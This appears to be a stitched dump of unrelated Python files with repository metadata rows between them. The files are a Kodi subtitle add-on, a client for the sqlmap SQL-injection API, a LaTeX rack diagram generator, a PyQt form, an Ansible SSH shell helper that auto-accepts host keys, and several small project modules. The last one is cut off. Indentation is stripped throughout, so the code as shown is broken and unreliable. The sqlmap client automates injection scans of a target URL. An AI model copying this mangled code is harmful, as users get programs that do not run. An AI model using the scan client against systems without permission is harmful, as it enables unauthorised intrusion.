json_query = '{"jsonrpc": "2.0", "method": "Player.GetItem", "params": {"playerid": ' + str(playerid) + ', "properties": ["tvshowid"]}, "id": 1}'
tvshowid = json.loads(xbmc.executeJSONRPC (json_query))['result']['item']['tvshowid']
# check result
if tvshowid > 0:
# get tvdbid
json_query = '{"jsonrpc": "2.0", "method": "VideoLibrary.GetTVShowDetails", "params": {"tvshowid": ' + str(tvshowid) + ', "properties": ["imdbnumber"]}, "id": 1}'
tvdbid_result = json.loads(xbmc.executeJSONRPC(json_query))
# if we have tvdbid, work with ids
if 'result' in tvdbid_result:
# get betaseries show id from tvdbid
tvdbid = tvdbid_result['result']['tvshowdetails']['imdbnumber']
showurl = "%s/shows/display?thetvdb_id=%s&key=%s&v=%s" % (self_host, tvdbid, self_apikey, self_apiver)
try:
showid = json.loads(get_url(showurl))["show"]["id"]
except:
log("could not parse data or fetch url for showid, cannot continue")
return False
log("after showid = %s" % (showid))
# then get betaseries episode id
episodeurl = "%s/episodes/search?show_id=%s&number=S%#02dE%#02d&key=%s&v=%s" % (self_host, showid, int(search['season']), int(search['episode']), self_apikey, self_apiver)
try:
episodeid = json.loads(get_url(episodeurl))["episode"]["id"]
log("after episodeid = %s" % (episodeid))
except:
log("error or episode not found!")
return False
# then get subtitles list
listurl = "%s/subtitles/episode?id=%s&key=%s&v=%s" % (self_host, episodeid, self_apikey, self_apiver)
try:
data = json.loads(get_url(listurl))["subtitles"]
except:
log("could not parse data or fetch url, cannot continue")
return False
# for each release version
log("parsing data after urlopen")
log("--------------------------")
for subtitle in data:
# get filename
subfile = normalize_string(subtitle["file"])
log("after subfile = %s" % (subfile))
# get file extension
ext = string.split(subfile,'.')[-1]
# get season number from data
season = int(subtitle["episode"]["season"])
log("after season = %s" % (season))
# get episode number from data
episode = int(subtitle["episode"]["episode"])
log("after episode = %s" % (episode))
# get names of files contained in zip file, if any
if len(subtitle["content"]) > 0:
content = subtitle["content"]
# or put filename in content
else:
content = [subtitle["file"]]
log("after content = %s" % (content))
# for each file in content
for subversion in content:
log("-------------")
# subtitle file name
subversion = normalize_string(subversion)
log("after subversion = %s" % (subversion))
# subtitle download url
link = subtitle["url"]
log("after link = %s" % (link))
try:
# normalize lang
lang2 = {
"VO": "en",
"VF": "fr",
"VOVF": "xx",
}[subtitle["language"]]
except:
log("unsupported language")
continue
# get note
if 0 <= int(subtitle["quality"]) <= 5:
note = int(subtitle["quality"])
else:
note = 0
log("after note = %s" % (note))
# check if file is a subtitle
if not len(re.findall(r"(?i)\.(srt|ssa|ass|sub)$", subversion)):
log("not a subtitle : %s" % (subversion))
continue
# if from a zip file
if len(content) > 1:
# check if file is for correct season and episode
search_string = r"(?i)(s%#02de%#02d|%d%#02d|%dx%#02d)" % (season, episode, season, episode, season, episode)
if not re.search(search_string, subversion):
log("file not matching episode : %s" % (subversion))
continue
# get subtitle file lang
langs = re.search(r"(?i)[ _.-](english|french|eng|fre|en|fr|vo|vf)[ _.-]", subversion)
# or get zip file lang
if langs == None:
langs = lang2
else:
langs = langs.group(1).lower()
log("after zip langs = %s" % (lang2))
try:
lang2 = {
"french": 'fr',
"english": 'en',
"fre": 'fr',
"eng": 'en',
"fr": 'fr',
"en": 'en',
"vf": 'fr',
"vo": 'en'
}[langs]
except:
log("unsupported language")
continue
log("after zip lang2 = %s" % (lang2))
try:
# get full language name
lang = xbmc.convertLanguage(lang2, xbmc.ENGLISH_NAME)
except:
log("unsupported language")
continue
# if lang = user gui language
if lang == search['uilang']:
# put this file on top
uilang = True
else:
uilang = False
log("after lang = %s, lang2 = %s" % (lang, lang2))
# check sync
sync = False
team = False
for (key, subteam) in enumerate(subteams):
# if team corresponds
if len(subteam) > 0 and len(re.findall(r"(?i)[ _.-](" + subteam + ")[ _.-]", subversion)) > 0:
# set sync tag
sync = True
# if videofile team matches subfile team
if key == 0:
team = True
log("after sync = %s" % (sync))
# check if this is for hearing impaired
if len(re.findall(r"(?i)[ _.-](CC|HI)[ _.-]", subversion)) > 0:
cc = True
else:
cc = False
log("after cc = %s" % (cc))
# if language allowed by user
if lang2 in search['langs']:
# add subtitle to list
subtitles.append({'uilang':uilang,'ext':ext,'filename':subversion,'link':link,'lang':lang,'lang2':lang2,"cc":cc,"sync":sync,"note":note,"team":team})
log("subtitle added : %s" % (subversion))
log("--------------------------")
if subtitles:
# get settings for sorting
uifirst = __addon__.getSetting('uifirst') == 'true'
ccfirst = __addon__.getSetting('ccfirst') == 'true'
# sort accordingly
log("sorting by filename asc")
subtitles.sort(key=lambda x: [x['filename']])
if not ccfirst:
log("sorting by cc last")
subtitles.sort(key=lambda x: [x['cc']])
log("sorting by note best")
subtitles.sort(key=lambda x: [x['note']], reverse=True)
log("sorting by lang asc")
subtitles.sort(key=lambda x: [x['lang']])
if ccfirst:
log("sorting by cc first")
subtitles.sort(key=lambda x: [not x['cc']])
if uifirst:
log("sorting by uilang first")
subtitles.sort(key=lambda x: [not x['uilang']])
log("sorting by sync first")
subtitles.sort(key=lambda x: [not x['sync']])
log("sorting by team first")
subtitles.sort(key=lambda x: [not x['team']])
log("sorted subtitles = %s" % (subtitles))
# for each subtitle
for item in subtitles:
# xbmc list item format
listitem = xbmcgui.ListItem(label=item["lang"],
label2=item["filename"],
iconImage=str(item["note"]),
thumbnailImage=item["lang2"])
# setting sync / CC tag
listitem.setProperty("sync", 'true' if item["sync"] else 'false')
listitem.setProperty("hearing_imp", 'true' if item["cc"] else 'false')
# adding item to GUI list
url = "plugin://%s/?action=download&link=%s&ext=%s&filename=%s" % (__addonid__, item["link"], item["ext"], urllib.quote(item["filename"]))
xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=url,listitem=listitem,isFolder=False)
else:
if self_notify:
xbmc.executebuiltin((u'Notification(%s,%s,%s,%s)' % (__addonname__, __language__(30010), 750, __icon__)).encode('utf-8', 'ignore'))
log("nothing found")
log("end of search_subtitles()")
# start of script
# clean up
if os.path.exists(__temp__):
log("deleting temp tree...")
shutil.rmtree(__temp__.encode("utf-8","ignore"))
log("recreating temp dir...")
xbmcvfs.mkdirs(__temp__)
# define user-agent
self_user_agent = set_user_agent()
# get params
params = get_params()
# called when user is searching for subtitles
if params['action'] == 'search':
item = {}
item['tvshow'] = xbmc.getInfoLabel("VideoPlayer.TVshowtitle").decode("utf-8")
item['year'] = xbmc.getInfoLabel("VideoPlayer.Year")
item['season'] = xbmc.getInfoLabel("VideoPlayer.Season")
item['episode'] = xbmc.getInfoLabel("VideoPlayer.Episode")
item['path'] = urllib.unquote(xbmc.Player().getPlayingFile().decode('utf-8'))
item['uilang'] = xbmc.getLanguage()
item['langs'] = []
# get user preferred languages for subtitles
for lang in urllib.unquote(params['languages']).decode('utf-8').split(","):
item['langs'].append(xbmc.convertLanguage(lang, xbmc.ISO_639_1))
# remove rar:// or stack://
if ( item['path'].find("rar://") > -1 ):
item['path'] = os.path.dirname(item['path'][6:])
elif ( item['path'].find("stack://") > -1 ):
stackPath = item['path'].split(" , ")
item['path'] = stackPath[0][8:]
# show item data in debug log
log("after item = %s" % (item))
# find playing mode
if len(item['tvshow']) > 0: item['mode'] = "tvshow"
elif item['year'] != "": item['mode'] = "movie"
else: item['mode'] = "file"
# search for subtitles
search_subtitles(item)
# called when user clicks on a subtitle
elif params['action'] == 'download':
# download link
sub = download_subtitle(params["link"], params["ext"], urllib.unquote(params["filename"]), self_host)
if sub:
# xbmc handles moving and using the subtitle
listitem = xbmcgui.ListItem(label=sub)
xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=sub,listitem=listitem,isFolder=False)
xbmcplugin.endOfDirectory(int(sys.argv[1]))
| gpl-2.0 | 4,025,818,231,595,275,000 | 40.690632 | 187 | 0.536685 | false | 3.764706 | false | false | false |
jetz/sqlmapcli | sqlmapcli/task.py | 1 | 8132 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
-----------------------------------------------------
@post('/scan/<taskid>/start')
@get('/scan/<taskid>/stop')
@get('/scan/<taskid>/kill')
@get('/scan/<taskid>/status')
@get('/scan/<taskid>/data')
-----------------------------------------------------
"""
import time
from urllib.parse import urljoin
import requests
from .logs import get_logger
from .exceptions import TaskStatusError, TaskResultError, TaskLogError
logger = get_logger('sqlmapcli')
class TaskStatus(object):
""" Task status constant """
READY = 'not running'
RUNNING = 'running'
FINISHED = 'terminated'
class Task(object):
def __init__(self, id, options, addr):
""" Create a task object.
Args:
id (str): task id from remote sqlmapapi server.
options (dict): options used to run task, see
`curl http://<host>:<port>/option/<taskid>/list`.
addr (str): remote sqlmapapi server address.
"""
self.id = id
self.addr = addr
self.options = options or {}
# always store url target in task object
self.url = self.options.get('url', None)
def __str__(self):
return '<Task#%s>' % self.id
def __repr__(self):
return str(self)
def _request(self, path, method='GET'):
""" Used to request remote sqlmapapi server.
Args:
path (str): url path for request.
method (str): GET or POST for different request.
Returns:
dict if successful, None otherwirse.
"""
try:
url, method = urljoin(self.addr, path), method.upper()
if method == 'GET':
r = requests.get(url).json()
elif method == 'POST':
r = requests.post(url, json=self.options).json()
except requests.RequestException as e:
logger.error('Fail to %s %s: %s' % (method, path, e))
return None
if r.get('success'):
return r
else:
logger.error('Fail to %s %s: %s' % (method, path, r.get('message'))) # noqa
return None
def set_option(self, key, value):
""" Set option for task.
Options can be set when client create task, or call `set_option`
after task is created but not start.
Args:
key (str): option name.
value (str): option value.
Returns:
Task: for chained call, eg.
`task.set_option(key, value).set_option(key, value)`.
"""
self.options[key] = value
if key == 'url':
self.url = value
return self
def get_option(self, key):
""" Get task option.
Args:
key (str): option name.
Returns:
str: option value.
"""
return self.options.get(key)
def update_options(self, options):
""" Update some options at same time.
Args:
options (dict): options that to update.
"""
self.options.update(options)
if 'url' in options:
self.url = options.get('url')
def list_options(self):
""" Get options that manually set.
Returns:
dict: options that user set.
"""
return self.options
def start(self, url=None, options=None):
""" Task start to run.
Args:
url (str): target url to scan by sqlmap, this is a shorthand
for set option with key `url`
options (Optional[dict]): shorthand, set options for task,
alternative to `set_option` or `update_options` or set
options when create task.
Returns:
str: engineid, maybe useful in future.
"""
if options:
self.update_options(options)
if url:
self.url = url
self.set_option('url', url)
r = self._request('/scan/%s/start' % self.id, 'POST')
self.engineid = r.get("engineid") if r else None
return self.engineid
def stop(self):
""" Stop running task.
Returns:
bool: True if stop successfully, False otherwise.
"""
r = self._request('/scan/%s/stop' % self.id)
return bool(r)
def kill(self):
""" Kill running task unconditionally.
Returns:
bool: True if Kill successfully, False otherwise.
"""
r = self._request('/scan/%s/kill' % self.id)
return bool(r)
def status(self):
""" Task currenty status, ready, running or finished.
Returns:
dict: include status and retcode.
Raises:
TaskStatusError: status exception.
"""
r = self._request('/scan/%s/status' % self.id)
if r:
status, retcode = r.get('status'), r.get('returncode')
return {'status': status, 'retcode': retcode}
else:
raise TaskStatusError("Can't get status")
@property
def ready(self):
""" shorthand for task status.
Returns:
bool: True if task is created but not start, False otherwise.
"""
try:
r = self.status()
return r.get('status') == TaskStatus.READY
except TaskStatusError as e:
logger.error('Fail to GET task<%s> status: %s', self.id, e)
return False
@property
def running(self):
""" shorthand for task status.
Returns:
bool: True if task start but not finished, False otherwise.
"""
try:
r = self.status()
return r.get('status') == TaskStatus.RUNNING
except TaskStatusError as e:
logger.error('Fail to GET task<%s> status: %s', self.id, e)
return False
@property
def finished(self):
""" shorthand for task status.
Returns:
bool: True if task is finished, False otherwise.
"""
try:
r = self.status()
return r.get('status') == TaskStatus.FINISHED
except TaskStatusError as e:
logger.error('Fail to GET task<%s> status: %s', self.id, e)
return False
def get_result(self):
""" Get task result.
Returns:
dict: task data.
Raises:
TaskResultError: task result exception.
"""
r = self._request('/scan/%s/data' % self.id)
if r:
return r.get('data')
else:
raise TaskResultError("Can't get result")
def get_log(self, start=None, end=None):
""" Get task log.
Args:
start (int): start index of log list.
end (int): end index of log list.
Returns:
dict: task log data.
Raises:
TaskLogError: task log exception.
"""
if start and end:
r = self._request('/scan/%s/log/%s/%s' % (self.id, start, end))
else:
r = self._request('/scan/%s/log' % self.id)
if r:
return r.get('log')
else:
raise TaskLogError("Can't get log")
def run(self, url=None, options=None, interval=5):
""" Shorthand for call `start`, `status` and `get_result`
Args:
url (str): target url to scan by sqlmap, this is a shorthand
for set option with key `url`
options (Optional[dict]): shorthand, set options for task,
alternative to `set_option` or `update_options` or set
options when create task.
interval (int): interval time toquery task status, seconds default.
Returns:
dict if successfully, None otherwise.
"""
self.start(url, options)
while self.running:
time.sleep(interval)
try:
r = self.get_result()
except TaskResultError as e:
logger.error('Fail to GET task<%s> result: %s', self.id, e)
return None
return r
| mit | 1,762,396,039,140,903,200 | 26.659864 | 88 | 0.522258 | false | 4.222222 | false | false | false |
jaqx0r/fengshui | rack2tex.py | 1 | 3011 | #!/usr/bin/python
import rack
import string
class RackView:
def __init__(self, name):
self.options = []
self.name = name
# output variable
self.o = []
self.notes = []
self.images = []
self.checklist = []
def render(self, thing):
"""
@param thing: the rack or rackarray to be drawn
"""
self.o.append("\\section{%s}" % (thing._name,))
self.o.append("\\begin{multicols}{2}")
self.o.append("\\includegraphics[height=\\textheight]{%s}" % (string.split(self.name, '.')[0],))
self.o.append("\\columnbreak")
# requirements
#self.o.append("\\\\Requirements")
#self.o.append("\\begin{itemize}")
#for (k, v) in [("network port", thing.network),
# ("power outlet", thing.power),
# ]:
# self.o.append("\item %s %s%s" % (v, k, ["s", ""][v == 1]))
#self.o.append("\\end{itemize}")
# recurse
for y in range(thing.units-1, -1, -1):
if thing._elements.has_key(y):
e = thing._elements[y]
if e is not None:
e.visit(self)
# notes
#self.o.append("\\subsubsection{Notes}")
#self.o.append("{\\small")
#if len(self.notes) > 0:
# self.o.append("\\begin{description}")
# self.o += self.notes
# self.o.append("\\end{description}")
#self.o.append("}%end small")
# checklist
if len(self.checklist) > 0:
self.o.append("\\begin{center}")
self.o.append("{\\footnotesize")
self.o.append("\\begin{tabular}{r|c|c|c|c|c}")
self.o.append("&racked&net&pow&on&servs\\\\")
self.o.append("\\hline")
self.o += self.checklist
self.o.append("\\end{tabular}")
self.o.append("}%end footnotesize")
self.o.append("\\end{center}")
# images
self.o.append("\\begin{center}")
self.o += self.images
self.o.append("\\end{center}")
self.o.append("\\end{multicols}")
# spit out
return string.join(self.o, "\n")
def visitRackElement(self, e):
if e.image != "":
self.images.append("\\includegraphics[width=4cm]{%s}\\\\" % (e.image,))
if e.notes != "":
self.notes.append("\\item[%s] %s" % (e.name, e.notes))
self.checklist.append("%s&&&&&\\\\\n\\hline" % (e.name,))
def visitCableManagement(self, cman):
pass
def visitRackmount(self, rm):
return self.visitRackElement(rm)
def visitSwitch(self, sw):
return self.visitRackElement(sw)
def visitAPC(self, apc):
return self.visitRackElement(apc)
def visitGap(self, gap):
pass
def visitShelf(self, shelf):
l = len(self.images)
for e in shelf._elements:
e.visit(self)
if len(self.images) > l:
self.images.append("\\\\")
def visitShelf1RU(self, shelf):
return self.visitShelf(shelf)
def visitShelf2U(self, shelf):
return self.visitShelf(shelf)
def visitShelf1a(self, shelf):
return self.visitShelf(shelf)
def visitBox(self, box):
if box.image != "":
self.images.append("\\includegraphics[width=%smm]{%s}" % (box.width/11,box.image))
if box.notes != "":
self.notes.append("\\item[%s] %s" % (box._name, box.notes))
self.checklist.append("%s&&&&&\\\\\n\\hline" % (box._name,))
| gpl-2.0 | 1,538,439,439,429,373,400 | 24.091667 | 98 | 0.608768 | false | 2.674067 | false | false | false |
vipersnh/regbank_reader | client/widgets/status_bar.py | 1 | 1872 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file './client/widgets/status_bar.ui'
#
# Created: Thu Sep 17 23:50:20 2015
# by: PyQt4 UI code generator 4.9.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_statusWidget(object):
def setupUi(self, statusWidget):
statusWidget.setObjectName(_fromUtf8("statusWidget"))
statusWidget.resize(625, 39)
self.horizontalLayout = QtGui.QHBoxLayout(statusWidget)
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.label_status = QtGui.QLabel(statusWidget)
self.label_status.setMinimumSize(QtCore.QSize(441, 16))
self.label_status.setText(_fromUtf8(""))
self.label_status.setObjectName(_fromUtf8("label_status"))
self.horizontalLayout.addWidget(self.label_status)
self.line = QtGui.QFrame(statusWidget)
self.line.setFrameShape(QtGui.QFrame.VLine)
self.line.setFrameShadow(QtGui.QFrame.Sunken)
self.line.setObjectName(_fromUtf8("line"))
self.horizontalLayout.addWidget(self.line)
self.label_record = QtGui.QLabel(statusWidget)
self.label_record.setMinimumSize(QtCore.QSize(151, 21))
self.label_record.setMaximumSize(QtCore.QSize(151, 16777215))
self.label_record.setText(_fromUtf8(""))
self.label_record.setObjectName(_fromUtf8("label_record"))
self.horizontalLayout.addWidget(self.label_record)
self.retranslateUi(statusWidget)
QtCore.QMetaObject.connectSlotsByName(statusWidget)
def retranslateUi(self, statusWidget):
statusWidget.setWindowTitle(QtGui.QApplication.translate("statusWidget", "Form", None, QtGui.QApplication.UnicodeUTF8))
| gpl-2.0 | -3,422,909,493,384,256,500 | 40.6 | 127 | 0.711004 | false | 3.875776 | false | false | false |
jonhadfield/ansible | lib/ansible/module_utils/issh.py | 5 | 5367 | #
# (c) 2015 Peter Sprygada, <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
"""
Ansible shared module for building modules that require an interactive
SSH Shell such as those for command line driven devices. This module
provides a native SSH transport using paramiko and builds a base Shell
class for creating shell driven modules.
In order to use this module, include it as part of a custom
module as shown below and create and subclass Shell.
** Note: The order of the import statements does matter. **
from ansible.module_utils.basic import *
from ansible.module_utils.ssh import *
This module provides the following common argument spec for creating
shell connections:
* host (str) - [Required] The IPv4 address or FQDN of the device
* port (int) - Overrides the default SSH port.
* username (str) - [Required] The username to use to authenticate
the SSH session.
* password (str) - [Required] The password to use to authenticate
the SSH session
* connect_timeout (int) - Specifies the connection timeout in seconds
"""
import re
import socket
from StringIO import StringIO
import paramiko
def shell_argument_spec(spec=None):
""" Generates an argument spec for the Shell class
"""
arg_spec = dict(
host=dict(required=True),
port=dict(default=22, type='int'),
username=dict(required=True),
password=dict(required=True),
connect_timeout=dict(default=10, type='int'),
)
if spec:
arg_spec.update(spec)
return arg_spec
class ShellError(Exception):
def __init__(self, msg, command=None):
super(ShellError, self).__init__(msg)
self.message = msg
self.command = command
class Command(object):
def __init__(self, command, prompt=None, response=None):
self.command = command
self.prompt = prompt
self.response = response
def __str__(self):
return self.command
class Ssh(object):
def __init__(self):
self.client = None
def open(self, host, port=22, username=None, password=None,
timeout=10, key_filename=None):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
use_keys = password is None
ssh.connect(host, port=port, username=username, password=password,
timeout=timeout, allow_agent=use_keys, look_for_keys=use_keys,
key_filename=key_filename)
self.client = ssh
return self.on_open()
def on_open(self):
pass
def close(self):
self.client.close()
return self.on_close()
def on_close(self):
pass
class Shell(Ssh):
def __init__(self):
super(Shell, self).__init__()
self.shell = None
self.prompts = list()
self.errors = list()
def on_open(self):
self.shell = self.client.invoke_shell()
self.shell.settimeout(10)
self.receive()
def receive(self, cmd=None):
recv = StringIO()
while True:
recv.write(self.shell.recv(200))
recv.seek(recv.tell() - 200)
window = recv.read()
if isinstance(cmd, Command):
self.handle_input(window, prompt=cmd.prompt,
response=cmd.response)
try:
if self.read(window):
resp = recv.getvalue()
return self.sanitize(cmd, resp)
except ShellError, exc:
exc.command = cmd
raise
def send(self, command):
try:
cmd = '%s\r' % str(command)
self.shell.sendall(cmd)
return self.receive(command)
except socket.timeout, exc:
raise ShellError("timeout trying to send command", cmd)
def handle_input(self, resp, prompt, response):
if not prompt or not response:
return
prompt = to_list(prompt)
response = to_list(response)
for pr, ans in zip(prompt, response):
match = pr.search(resp)
if match:
cmd = '%s\r' % ans
self.shell.sendall(cmd)
def sanitize(self, cmd, resp):
cleaned = []
for line in resp.splitlines():
if line.startswith(str(cmd)) or self.read(line):
continue
cleaned.append(line)
return "\n".join(cleaned)
def read(self, response):
for regex in self.errors:
if regex.search(response):
raise ShellError('{}'.format(response))
for regex in self.prompts:
if regex.search(response):
return True
| gpl-3.0 | 3,679,719,289,842,315,300 | 26.664948 | 82 | 0.611515 | false | 4.154025 | false | false | false |
kgullikson88/IGRINS_Scripts | CheckSystematics.py | 1 | 2096 | from __future__ import print_function
from collections import defaultdict
from astropy.io import fits
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
def telluric_systematics(file_list, header_kw='HUMIDITY', plot=True, ref_num=10):
"""
Find the average change in the requested header keyword over all IGRINS telluric fits
:param file_list: A list of IGRINS Corrected_* files
:param header_kw: the keyword to search for in each fits extension header
:param plot: If true, plot all of the values
:param ref_num: Which extension to use as the reference
:return: The median value of the keyword for each fits extension
"""
data = defaultdict(list)
for fname in file_list:
print(fname)
hdulist = fits.open(fname)
for i, hdu in enumerate(hdulist[1:]):
data['fname'].append(fname)
data['Ext_num'].append(i + 1)
data['Middle_Wavelength'].append(np.median(hdu.data.field('wavelength')))
data['value'].append(hdu.header[header_kw])
# Convert the dict to a dataframe for easier access
df = pd.DataFrame(data=data)
# Scale by the median value of the keyword within the given filename
# (to account for weather variations rather than data systematics)
median_values = defaultdict(float)
for fname in file_list:
median_values[fname] = float(df.loc[(df.fname == fname) & (df.Ext_num == ref_num)]['value'])
print(median_values)
make_scaled = lambda row: row['value'] / median_values[row['fname']]
df['scaled_value'] = df.apply(make_scaled, axis=1)
# Determine the median value for each fits extension
median = df.groupby('Ext_num').median()[['Middle_Wavelength', 'scaled_value']]
# Plot, if desired
if plot:
plt.scatter(df.Middle_Wavelength, df.scaled_value, color='red', alpha=0.1)
plt.plot(median.Middle_Wavelength, median.scaled_value, color='green', lw=2)
plt.xlabel('Wavelength (nm)')
plt.ylabel('{} scale factor'.format(header_kw))
plt.show()
return median
| mit | -4,900,011,001,830,106,000 | 37.814815 | 100 | 0.668893 | false | 3.729537 | false | false | false |
jmp1985/metrix-database | database.py | 1 | 1371 | from __future__ import division
class MetrixDB(object):
'''
A high level class to perform operations on the metrix database
'''
def __init__(self, overwrite=False):
'''
Initialise the database
'''
from metrix_db.initialiser import Initialiser
initialiser = Initialiser(overwrite=overwrite)
self.handle = initialiser.handle
def add_pdb_entry(self, pdb_id, filename):
'''
Add a pdb entry to the database
'''
from metrix_db.pdb_parser import PDBParser
parser = PDBParser(self.handle)
parser.add_entry(pdb_id, filename)
def add_xia2_entry(self,
pdb_id,
xia2_txt_filename,
xia2_json_filename):
'''
Add a xia2 entry to the database
'''
from metrix_db.xia2_parser import XIA2Parser
parser = XIA2Parser(self.handle)
parser.add_entry(pdb_id, xia2_txt_filename, xia2_json_filename)
def add_protein_entry(self, pdb_id, filename):
'''
Add a protein entry to the database
'''
from metrix_db.protein_parser import ProteinParser
parser = ProteinParser(self.handle)
parser.add_protein(pdb_id, filename)
def write_csv(self, filename):
'''
Write a CSV file from the database
'''
from metrix_db.csv_writer import CSVWriter
writer = CSVWriter(self.handle)
writer.write(filename)
| bsd-2-clause | 1,228,949,856,530,809,000 | 23.482143 | 67 | 0.645514 | false | 3.646277 | false | false | false |
markvl/acrylamid | acrylamid/views/tag.py | 2 | 3986 | # -*- encoding: utf-8 -*-
#
# Copyright 2012 Martin Zimmermann <[email protected]>. All rights reserved.
# License: BSD Style, 2 clauses -- see LICENSE.
import math
import random
from collections import defaultdict
from acrylamid.compat import iteritems
from acrylamid.helpers import expand, safeslug, hash
from acrylamid.views.index import Index, Paginator
def fetch(entrylist):
"""Fetch tags from list of entries and map tags to most common tag name
"""
tags = defaultdict(list)
tmap = defaultdict(int)
for e in entrylist:
for tag in e.tags:
tags[tag.lower()].append(e)
tmap[tag] += 1
# map tags to the most counted tag name
for name in list(tags.keys()):
key = max([(tmap[key], key) for key in tmap
if key.lower() == name])[1]
rv = tags.pop(key.lower())
tags[key] = rv
return tags
class Tagcloud(object):
"""Tagcloud helper class similar (almost identical) to pelican's tagcloud helper object.
Takes a bunch of tags and produces a logarithm-based partition and returns a iterable
object yielding a Tag-object with two attributes: name and step where step is the
calculated step size (== font size) and reaches from 0 to steps-1.
:param tags: a dictionary of tags, e.g. {'name', [list of entries]}
:param steps: maximum steps
:param max_items: maximum items shown in tagcloud
:param start: start index of steps resulting in start to steps+start-1 steps."""
def __init__(self, tags, steps=4, max_items=100, start=0, shuffle=False):
lst = sorted([(k, len(v)) for k, v in iteritems(tags)],
key=lambda x: x[0])[:max_items]
# stolen from pelican/generators.py:286
max_count = max(lst, key=lambda k: k[1])[1] if lst else None
self.lst = [(tag, count,
int(math.floor(steps - (steps - 1) * math.log(count)
/ (math.log(max_count) or 1)))+start-1)
for tag, count in lst]
if shuffle:
random.shuffle(self.lst)
self.tags = tags
def __iter__(self):
for tag, count, step in self.lst:
yield type('Tag', (), {'name': tag, 'step': step, 'count': count})
def __hash__(self):
return hash(*self.lst)
def __getitem__(self, tag):
return self.tags[tag.name]
class Tag(Index):
"""Same behaviour like Index except ``route`` that defaults to */tag/:name/* and
``pagination`` that defaults to */tag/:name/:num/* where :name is the current
tag identifier.
To create a tag cloud head over to :doc:`conf.py`.
"""
export = ['prev', 'curr', 'next', 'items_per_page', 'tag', 'entrylist']
template = 'main.html'
def populate_tags(self, request):
tags = fetch(request['entrylist'])
self.tags = tags
return tags
def context(self, conf, env, request):
class Link:
def __init__(self, title, href):
self.title = title
self.href = href
def tagify(tags):
href = lambda t: expand(self.path, {'name': safeslug(t)})
return [Link(t, href(t)) for t in tags] if isinstance(tags, (list, tuple)) \
else Link(tags, href(tags))
tags = self.populate_tags(request)
env.engine.register('tagify', tagify)
env.tag_cloud = Tagcloud(tags, conf['tag_cloud_steps'],
conf['tag_cloud_max_items'],
conf['tag_cloud_start_index'],
conf['tag_cloud_shuffle'])
return env
def generate(self, conf, env, data):
"""Creates paged listing by tag."""
for tag in self.tags:
data['entrylist'] = [entry for entry in self.tags[tag]]
for res in Paginator.generate(self, conf, env, data, tag=tag, name=safeslug(tag)):
yield res
| bsd-2-clause | 2,275,150,804,303,033,000 | 31.942149 | 94 | 0.580281 | false | 3.84378 | false | false | false |
tudorian/eden | modules/s3db/vol.py | 2 | 28816 | # -*- coding: utf-8 -*-
"""
Sahana Eden Volunteers Management
(Extends modules/eden/hrm.py)
@copyright: 2012-15 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ["S3VolunteerModel",
"S3VolunteerAwardModel",
"S3VolunteerClusterModel",
"vol_service_record",
]
try:
# Python 2.7
from collections import OrderedDict
except ImportError:
# Python 2.6
from gluon.contrib.simplejson.ordered_dict import OrderedDict
from gluon import *
from gluon.storage import Storage
from ..s3 import *
from s3layouts import S3AddResourceLink
# =============================================================================
class S3VolunteerModel(S3Model):
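    """
        Additional details for Volunteers (active status, availability,
        card-holder flag), extending the core HRM human resource record
    """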
names = ("vol_details",)
def model(self):
T = current.T
UNKNOWN_OPT = current.messages.UNKNOWN_OPT
availability_opts = {1: T("No Restrictions"),
2: T("Weekends only"),
3: T("School Holidays only"),
}
# ---------------------------------------------------------------------
# Volunteer Details
# - extra details for volunteers
#
tablename = "vol_details"
self.define_table(tablename,
self.hrm_human_resource_id(ondelete = "CASCADE"),
Field("active", "boolean",
default = False,
label = T("Active"),
represent = self.vol_active_represent,
),
Field("availability", "integer",
label = T("Availability"),
represent = lambda opt: \
availability_opts.get(opt,
UNKNOWN_OPT),
requires = IS_EMPTY_OR(
IS_IN_SET(availability_opts)
),
),
Field("card", "boolean",
default = False,
label = T("Card holder"),
represent = self.vol_active_represent,
# Enable in-template when-required
readable = False,
writable = False,
),
*s3_meta_fields())
# =========================================================================
@staticmethod
def vol_active_represent(opt):
""" Represent the Active status of a Volunteer """
if "report" in current.request.args:
# We can't use a represent
return opt
# List view, so HTML represent is fine
if opt:
output = DIV(current.T("Yes"), _style="color:green")
else:
output = DIV(current.T("No"), _style="color:red")
return output
# =============================================================================
class S3VolunteerAwardModel(S3Model):
names = ("vol_award",
"vol_volunteer_award",
)
def model(self):
T = current.T
db = current.db
auth = current.auth
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
ADMIN = current.session.s3.system_roles.ADMIN
